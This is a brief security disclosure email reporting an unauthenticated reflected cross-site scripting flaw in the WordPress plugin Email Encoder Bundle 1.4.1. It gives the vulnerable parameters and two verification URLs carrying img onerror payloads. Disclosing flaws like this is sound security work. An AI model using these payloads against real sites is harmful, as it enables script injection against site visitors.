Subject: Cross Site Scripting (XSS) in Email Encoder Bundle - Protect Email Address 1.4.1

Date: Mon, 10 Aug 2015 17:13:18 +0200

Hello,

Plugin: Email Encoder Bundle - Protect Email Address 1.4.1 https://wordpress.org/plugins/email-encoder-bundle/

1. Cross Site Scripting (XSS)

Unauthenticated users can inject js/html.

Method: GET

Example url: http://localhost/?ajaxEncodeEmail=1&email=[xss]

Vulnerable parameters: email, display

Example PHP callstack:

/email-encoder-bundle/email-encoder-bundle.php:45

Verification:

http://localhost/?ajaxEncodeEmail=1&email=%22%3E%3Cimg%20src=x%20onerror=alert%281%29%3E

http://localhost/?ajaxEncodeEmail=1&email=x&display=y%3Cimg%20src=x%20onerror=alert%281%29%3E

--

Regards,
Marcin Probola,